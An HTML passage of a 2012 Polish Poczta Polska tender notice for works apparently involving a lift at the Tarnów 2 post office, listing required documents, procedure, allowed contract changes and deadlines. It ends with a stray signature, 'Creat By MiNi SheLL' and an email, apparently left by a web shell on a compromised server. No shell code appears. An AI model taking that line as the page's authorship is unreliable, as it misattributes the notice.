<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INNE DOKUMENTY, które należy załączyć do oferty:

1.	Podpisany formularz oferty - który należy umieścić jako pierwszą stronę oferty.
2.	Wypełniona i podpisana  tabela elementów rozliczeniowych umowy - zgodnie z SIWZ
3.	Oświadczenie o uprawnieniach zgodne z SIWZ. 
4.	Dowód wpłaty wadium 
5.	Pełnomocnictwo - jeżeli dokumenty będą podpisane przez pełnomocnika firmy lub inną osobę upoważnioną -   załączone w oryginale lub w postaci kopii poświadczonej notarialnie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwe zmiany postanowień umowy:
1)	zmiany terminu umownego wykonania przedmiotu umowy, o którym mowa w § 11   wzoru umowy w przypadku:
a)   Z powodu działania siły wyższej. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, eksplozję, awarie elektryczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organa państwowe, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza kontrolą stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec.
b)  	Opóźnienia Zamawiającego w przekazaniu terenu budowy.
c)  	Okoliczności leżących po stronie Zamawiającego, w szczególności  konieczność zgłoszenia przez Zamawiającego konieczności czasowego wstrzymania  prac z uwagi na zaistniałe uwarunkowania funkcjonalno-eksploatacyjne Urzędu Pocztowego Tarnów 2, który będzie czynny w okresie realizacji umowy.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ppkt 1). termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

2)	Zmiany sposobu spełnienia świadczenia: 
	a) 	zmiany technologiczno-techniczne, w szczególności:
	-  konieczność zrealizowania wymiany dźwigu przy zastosowaniu innych rozwiązań technicznych     lub materiałowych ze względu na zmiany obowiązującego prawa zaszłe w trakcie realizacji umowy.
	 b)        zmiany osobowe:
                                 -  zmiana osób, przy pomocy których Wykonawca realizuje przedmiot  umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami;
                          -     zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje
   przedmiot umowy na innego dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym;
		            -    zmiany Inspektora/ów Nadzoru ze strony Zamawiającego
                          -    zmiana Specjalisty BHP 

3) 	Zmiany stawki podatku VAT w przypadku, gdy w momencie wszczęcia postępowania na wyłonienie Wykonawcy robót lub prac  określonych w § 1 wzoru umowy nie dało się przewidzieć (np. w oparciu o ogłoszone, lecz nieobowiązujące jeszcze przepisy), iż nastąpi zmiana stawki podatku VAT na roboty lub usługi objęte przedmiotem umowy. 
	Warunkiem wprowadzenia zmiany stawki VAT jest wejście w życie zmian przepisów, które pozostają w związku z umową i zastosowanie, których jest wymagane dla działania stron, zgodnie z obowiązującym porządkiem prawnym. 
4) 	Wszelkie zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej w postaci aneksu pod rygorem nieważności, z zastrzeżeniem § 12 ust. 9 i § 23 ust. 2 zdanie drugie wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl/O firmie/Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie 31-045 Kraków ul. Westerplatte 20 pok. 409 IVp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 11:00, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie 31-045 Kraków ul. Westerplatte 20 pok. 409 IVp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.09.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com